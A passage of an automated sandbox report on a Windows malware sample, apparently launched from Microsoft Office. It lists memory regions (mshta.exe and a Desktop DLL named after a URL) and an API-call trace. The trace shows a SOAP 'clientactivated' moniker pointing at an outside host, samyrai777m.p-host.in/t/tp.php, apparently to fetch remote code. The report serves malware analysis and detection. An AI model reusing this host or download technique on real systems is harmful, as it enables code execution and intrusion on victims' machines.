filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 539
start_va = 0x7fef6770000
end_va = 0x7fef67e0fff
entry_point = 0x7fef6770000
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 540
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 541
start_va = 0x7fefbde0000
end_va = 0x7fefbe06fff
entry_point = 0x7fefbde0000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 542
start_va = 0x7fefbdd0000
end_va = 0x7fefbddafff
entry_point = 0x7fefbdd0000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 543
start_va = 0x7fefbc50000
end_va = 0x7fefbc60fff
entry_point = 0x7fefbc50000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 544
start_va = 0x7fefbc30000
end_va = 0x7fefbc47fff
entry_point = 0x7fefbc30000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 545
start_va = 0x7fefcc40000
end_va = 0x7fefcc49fff
entry_point = 0x7fefcc40000
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 546
start_va = 0x23640000
end_va = 0x2373ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000023640000"
filename = ""
Region:
id = 547
start_va = 0x7fefce60000
end_va = 0x7fefcebafff
entry_point = 0x7fefce60000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 548
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 549
start_va = 0x23740000
end_va = 0x2394ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000023740000"
filename = ""
Region:
id = 550
start_va = 0x7fef46d0000
end_va = 0x7fef46d7fff
entry_point = 0x7fef46d0000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 551
start_va = 0x2e80000
end_va = 0x2e90fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002e80000"
filename = ""
Region:
id = 552
start_va = 0x7fefbc80000
end_va = 0x7fefbcd2fff
entry_point = 0x7fefbc80000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 553
start_va = 0x231b0000
end_va = 0x2335ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000231b0000"
filename = ""
Region:
id = 554
start_va = 0x233a0000
end_va = 0x2341ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000233a0000"
filename = ""
Region:
id = 555
start_va = 0x2ea0000
end_va = 0x2ea0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002ea0000"
filename = ""
Region:
id = 556
start_va = 0x642ff4a0000
end_va = 0x642ff4a9fff
entry_point = 0x642ff4a0000
region_type = mapped_file
name = "culture.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll")
Region:
id = 685
start_va = 0x2ea0000
end_va = 0x2ef3fff
entry_point = 0x2ea0000
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll")
Region:
id = 686
start_va = 0x2f00000
end_va = 0x2f07fff
entry_point = 0x2f00000
region_type = mapped_file
name = "http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll"
filename = "\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll" (normalized: "c:\\users\\aetadzjz\\desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll")
Region:
id = 687
start_va = 0x2f10000
end_va = 0x2f10fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002f10000"
filename = ""
Region:
id = 688
start_va = 0x75350000
end_va = 0x75357fff
entry_point = 0x75350000
region_type = mapped_file
name = "http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll"
filename = "\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll" (normalized: "c:\\users\\aetadzjz\\desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll")
Region:
id = 689
start_va = 0x7fee1120000
end_va = 0x7fee12a3fff
entry_point = 0x7fee1120000
region_type = mapped_file
name = "mscorjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll")
Region:
id = 690
start_va = 0x7ff001a0000
end_va = 0x7ff001affff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001a0000"
filename = ""
Region:
id = 691
start_va = 0x2f20000
end_va = 0x2f2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f20000"
filename = ""
Region:
id = 692
start_va = 0x2f30000
end_va = 0x2f3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f30000"
filename = ""
Region:
id = 693
start_va = 0x2f40000
end_va = 0x2f4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f40000"
filename = ""
Region:
id = 694
start_va = 0x2f50000
end_va = 0x2f5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f50000"
filename = ""
Region:
id = 695
start_va = 0x2f60000
end_va = 0x2f6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f60000"
filename = ""
Region:
id = 696
start_va = 0x7ff001b0000
end_va = 0x7ff001effff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001b0000"
filename = ""
Region:
id = 697
start_va = 0x2f70000
end_va = 0x2f73fff
entry_point = 0x2f70000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 698
start_va = 0x57e0000
end_va = 0x580ffff
entry_point = 0x57e0000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db")
Region:
id = 699
start_va = 0x4cc0000
end_va = 0x4cc3fff
entry_point = 0x4cc0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 700
start_va = 0x5810000
end_va = 0x5875fff
entry_point = 0x5810000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 713
start_va = 0xff9d0000
end_va = 0xff9dffff
entry_point = 0xff9d2c24
region_type = mapped_file
name = "mshta.exe"
filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")
Region:
id = 725
start_va = 0x4de0000
end_va = 0x4de0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004de0000"
filename = ""
Region:
id = 730
start_va = 0xff9d0000
end_va = 0xff9dffff
entry_point = 0xff9d2c24
region_type = mapped_file
name = "mshta.exe"
filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")
Region:
id = 812
start_va = 0x5680000
end_va = 0x568bfff
entry_point = 0x5680000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 813
start_va = 0x56a0000
end_va = 0x56a7fff
entry_point = 0x56a0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 814
start_va = 0x56c0000
end_va = 0x56cffff
entry_point = 0x56c0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 815
start_va = 0x5880000
end_va = 0x58bffff
entry_point = 0x5880000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat")
Region:
id = 816
start_va = 0x58c0000
end_va = 0x58c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000058c0000"
filename = ""
Region:
id = 817
start_va = 0x58d0000
end_va = 0x58d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000058d0000"
filename = ""
Region:
id = 818
start_va = 0x23950000
end_va = 0x23c92fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000023950000"
filename = ""
Region:
id = 819
start_va = 0x7fef6630000
end_va = 0x7fef6638fff
entry_point = 0x7fef6630000
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll")
Region:
id = 824
start_va = 0x97f0000
end_va = 0x97fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000097f0000"
filename = ""
Region:
id = 825
start_va = 0x230a0000
end_va = 0x2319ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000230a0000"
filename = ""
Region:
id = 826
start_va = 0x237c0000
end_va = 0x238bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000237c0000"
filename = ""
Region:
id = 827
start_va = 0x238d0000
end_va = 0x2394ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000238d0000"
filename = ""
Region:
id = 828
start_va = 0x779c0000
end_va = 0x779c2fff
entry_point = 0x779c0000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 829
start_va = 0x7fefafc0000
end_va = 0x7fefafd4fff
entry_point = 0x7fefafc0000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 830
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 831
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 832
start_va = 0x7fefafa0000
end_va = 0x7fefafb8fff
entry_point = 0x7fefafa0000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 833
start_va = 0x7fefaf90000
end_va = 0x7fefaf9afff
entry_point = 0x7fefaf90000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 1161
start_va = 0x97a0000
end_va = 0x97b0fff
entry_point = 0x97a0000
region_type = mapped_file
name = "c_20127.nls"
filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls")
Region:
id = 1162
start_va = 0x23ce0000
end_va = 0x23ddffff
entry_point = 0x0
region_type = private
name = "private_0x0000000023ce0000"
filename = ""
Region:
id = 1163
start_va = 0x7fef1260000
end_va = 0x7fef127dfff
entry_point = 0x7fef1260000
region_type = mapped_file
name = "hlink.dll"
filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll")
Region:
id = 1164
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 1165
start_va = 0x7fee04c0000
end_va = 0x7fee059bfff
entry_point = 0x7fee04c0000
region_type = mapped_file
name = "unidrvui.dll"
filename = "\\Windows\\System32\\spool\\drivers\\x64\\3\\UniDrvUI.dll" (normalized: "c:\\windows\\system32\\spool\\drivers\\x64\\3\\unidrvui.dll")
Region:
id = 1166
start_va = 0x5900000
end_va = 0x5904fff
entry_point = 0x5900000
region_type = mapped_file
name = "sendtoonenote.bud"
filename = "\\Windows\\System32\\spool\\drivers\\x64\\3\\SendToOneNote.BUD" (normalized: "c:\\windows\\system32\\spool\\drivers\\x64\\3\\sendtoonenote.bud")
Region:
id = 1167
start_va = 0xff9d0000
end_va = 0xff9dffff
entry_point = 0xff9d2c24
region_type = mapped_file
name = "mshta.exe"
filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")
Region:
id = 1825
start_va = 0x5920000
end_va = 0x5921fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005920000"
filename = ""
Region:
id = 1826
start_va = 0x5a70000
end_va = 0x5a71fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005a70000"
filename = ""
Region:
id = 1827
start_va = 0x6f30000
end_va = 0x6fdafff
entry_point = 0x6f30000
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 1828
start_va = 0x6fe0000
end_va = 0x6fe1fff
entry_point = 0x0
region_type = private
name = "private_0x0000000006fe0000"
filename = ""
Region:
id = 1829
start_va = 0x7020000
end_va = 0x7021fff
entry_point = 0x0
region_type = private
name = "private_0x0000000007020000"
filename = ""
Region:
id = 1830
start_va = 0x9420000
end_va = 0x9421fff
entry_point = 0x0
region_type = private
name = "private_0x0000000009420000"
filename = ""
Region:
id = 1831
start_va = 0x97c0000
end_va = 0x97c1fff
entry_point = 0x0
region_type = private
name = "private_0x00000000097c0000"
filename = ""
Region:
id = 1832
start_va = 0x97e0000
end_va = 0x97e1fff
entry_point = 0x0
region_type = private
name = "private_0x00000000097e0000"
filename = ""
Region:
id = 1833
start_va = 0x9890000
end_va = 0x9891fff
entry_point = 0x0
region_type = private
name = "private_0x0000000009890000"
filename = ""
Region:
id = 1834
start_va = 0x99a0000
end_va = 0x9a6bfff
entry_point = 0x99a0000
region_type = mapped_file
name = "times.ttf"
filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf")
Region:
id = 1835
start_va = 0x9a80000
end_va = 0x9a81fff
entry_point = 0x0
region_type = private
name = "private_0x0000000009a80000"
filename = ""
Region:
id = 1836
start_va = 0x9aa0000
end_va = 0x9aa1fff
entry_point = 0x0
region_type = private
name = "private_0x0000000009aa0000"
filename = ""
Region:
id = 1837
start_va = 0x9c80000
end_va = 0x9c81fff
entry_point = 0x0
region_type = private
name = "private_0x0000000009c80000"
filename = ""
Region:
id = 1838
start_va = 0xa4b0000
end_va = 0xa569fff
entry_point = 0xa4b0000
region_type = mapped_file
name = "calibril.ttf"
filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf")
Region:
id = 1839
start_va = 0x22c50000
end_va = 0x22d16fff
entry_point = 0x22c50000
region_type = mapped_file
name = "calibri.ttf"
filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf")
Region:
id = 1840
start_va = 0x22fe0000
end_va = 0x23088fff
entry_point = 0x0
region_type = private
name = "private_0x0000000022fe0000"
filename = ""
Region:
id = 1841
start_va = 0x231a0000
end_va = 0x2326dfff
entry_point = 0x231a0000
region_type = mapped_file
name = "timesbd.ttf"
filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf")
Region:
id = 1842
start_va = 0x23de0000
end_va = 0x2419ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000023de0000"
filename = ""
Region:
id = 1843
start_va = 0x241a0000
end_va = 0x24274fff
entry_point = 0x241a0000
region_type = mapped_file
name = "calibrili.ttf"
filename = "\\Windows\\Fonts\\CalibriLI.ttf" (normalized: "c:\\windows\\fonts\\calibrili.ttf")
Region:
id = 1844
start_va = 0x242a0000
end_va = 0x2526ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000242a0000"
filename = ""
Region:
id = 1845
start_va = 0x25270000
end_va = 0x25a6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000025270000"
filename = ""
Region:
id = 1846
start_va = 0x25a70000
end_va = 0x26dc4fff
entry_point = 0x25a70000
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")
Region:
id = 1847
start_va = 0x26dd0000
end_va = 0x26ea0fff
entry_point = 0x26dd0000
region_type = mapped_file
name = "calibrii.ttf"
filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf")
Region:
id = 1848
start_va = 0x7fede480000
end_va = 0x7fede4d3fff
entry_point = 0x7fede480000
region_type = mapped_file
name = "msproof7.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msproof7.dll")
Region:
id = 1849
start_va = 0x7fef6190000
end_va = 0x7fef619bfff
entry_point = 0x7fef6191380
region_type = mapped_file
name = "linkinfo.dll"
filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll")
Region:
id = 1850
start_va = 0x2720000
end_va = 0x2720fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 1851
start_va = 0x7fede3f0000
end_va = 0x7fede47cfff
entry_point = 0x7fede3f0000
region_type = mapped_file
name = "msgr8en.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1033\\msgr8en.dll")
Thread:
id = 1
os_tid = 0xa68
Thread:
id = 2
os_tid = 0xa64
Thread:
id = 3
os_tid = 0xa54
Thread:
id = 4
os_tid = 0xa30
Thread:
id = 5
os_tid = 0xa2c
Thread:
id = 6
os_tid = 0xa28
Thread:
id = 7
os_tid = 0xa24
Thread:
id = 8
os_tid = 0xa20
Thread:
id = 9
os_tid = 0x9f4
Thread:
id = 10
os_tid = 0x9dc
Thread:
id = 11
os_tid = 0x9d0
Thread:
id = 12
os_tid = 0x9cc
Thread:
id = 13
os_tid = 0x9c4
Thread:
id = 14
os_tid = 0x9bc
Thread:
id = 15
os_tid = 0x9b4
[0041.733] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x80010106
[0042.059] IIDFromString (in: lpsz="{ecabafd1-7f19-11d2-978e-0000f8757e2a}", lpiid=0x279498 | out: lpiid=0x279498) returned 0x0
[0042.100] IIDFromString (in: lpsz="{ecabafd1-7f19-11d2-978e-0000f8757e2a}", lpiid=0x279650 | out: lpiid=0x279650) returned 0x0
[0042.130] SysStringByteLen (bstr="http://www.samyrai777m.p-host.in/t/tp.php?thread=0") returned 0x64
[0042.130] SysStringByteLen (bstr="http://www.samyrai777m.p-host.in/t/tp.php?thread=0") returned 0x64
[0042.130] SysStringByteLen (bstr="clientactivated") returned 0x1e
[0042.130] SysStringByteLen (bstr="clientactivated") returned 0x1e
[0042.156] CoTaskMemAlloc (cb=0x804) returned 0x79931e0
[0042.156] GetSystemDirectoryW (in: lpBuffer=0x79931e0, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0042.158] CoTaskMemFree (pv=0x79931e0)
[0042.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly\\", nBufferLength=0x105, lpBuffer=0x27a4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\com\\SOAPAssembly\\", lpFilePart=0x0) returned 0x25
[0042.214] GetVersionExW (in: lpVersionInformation=0x27a570*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x27a570*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0042.233] SetErrorMode (uMode=0x1) returned 0x8001
[0042.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly\\" (normalized: "c:\\windows\\system32\\com\\soapassembly"), fInfoLevelId=0x0, lpFileInformation=0x27a6d0 | out: lpFileInformation=0x27a6d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0042.248] SetErrorMode (uMode=0x8001) returned 0x1
[0042.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly\\", nBufferLength=0x105, lpBuffer=0x27a4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\com\\SOAPAssembly\\", lpFilePart=0x0) returned 0x25
[0042.273] SetErrorMode (uMode=0x1) returned 0x8001
[0042.273] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly" (normalized: "c:\\windows\\system32\\com\\soapassembly"), fInfoLevelId=0x0, lpFileInformation=0x27a5f0 | out: lpFileInformation=0x27a5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0042.274] SetErrorMode (uMode=0x8001) returned 0x1
[0042.274] SetErrorMode (uMode=0x1) returned 0x8001
[0042.275] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\com" (normalized: "c:\\windows\\system32\\com"), fInfoLevelId=0x0, lpFileInformation=0x27a5f0 | out: lpFileInformation=0x27a5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfece69ac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1da26978, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1da26978, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0042.275] SetErrorMode (uMode=0x8001) returned 0x1
[0042.275] SetErrorMode (uMode=0x1) returned 0x8001
[0042.275] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x27a5f0 | out: lpFileInformation=0x27a5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb3c9890, ftCreationTime.dwHighDateTime=0x1d30211, ftLastAccessTime.dwLowDateTime=0x60dd8710, ftLastAccessTime.dwHighDateTime=0x1d30212, ftLastWriteTime.dwLowDateTime=0x60dd8710, ftLastWriteTime.dwHighDateTime=0x1d30212, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0042.276] SetErrorMode (uMode=0x8001) returned 0x1
[0042.276] SetErrorMode (uMode=0x1) returned 0x8001
[0042.276] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x27a5f0 | out: lpFileInformation=0x27a5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb3a3730, ftCreationTime.dwHighDateTime=0x1d30211, ftLastAccessTime.dwLowDateTime=0xde098210, ftLastAccessTime.dwHighDateTime=0x1d30614, ftLastWriteTime.dwLowDateTime=0xde098210, ftLastWriteTime.dwHighDateTime=0x1d30614, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0042.276] SetErrorMode (uMode=0x8001) returned 0x1
[0042.277] CreateDirectoryW (lpPathName="C:\\Windows\\system32\\com\\SOAPAssembly" (normalized: "c:\\windows\\system32\\com\\soapassembly"), lpSecurityAttributes=0x0) returned 0
[0042.964] GetVersionExW (in: lpVersionInformation=0x277ea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x277ea0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0042.974] GetVersionExW (in: lpVersionInformation=0x277ea0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x277ea0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0043.034] lstrlenW (lpString="䅁") returned 1
[0043.047] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x278088 | out: phkResult=0x278088*=0xa30) returned 0x0
[0043.056] RegQueryInfoKeyW (in: hKey=0xa30, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x277ffc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x277ff8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x277ffc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x277ff8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0043.057] CoTaskMemFree (pv=0x0)
[0043.057] CoTaskMemAlloc (cb=0x204) returned 0x5ab8fc0
[0043.057] RegEnumKeyExW (in: hKey=0xa30, dwIndex=0x0, lpName=0x5ab8fc0, lpcchName=0x278088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x278088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0043.057] CoTaskMemFree (pv=0x5ab8fc0)
[0043.057] CoTaskMemFree (pv=0x0)
[0043.057] CoTaskMemAlloc (cb=0x204) returned 0x5ab8fc0
[0043.057] RegEnumKeyExW (in: hKey=0xa30, dwIndex=0x1, lpName=0x5ab8fc0, lpcchName=0x278088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x278088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0043.057] CoTaskMemFree (pv=0x5ab8fc0)
[0043.057] CoTaskMemFree (pv=0x0)
[0043.057] CoTaskMemAlloc (cb=0x204) returned 0x5ab8fc0
[0043.057] RegEnumKeyExW (in: hKey=0xa30, dwIndex=0x2, lpName=0x5ab8fc0, lpcchName=0x278088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x278088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0043.058] CoTaskMemFree (pv=0x5ab8fc0)
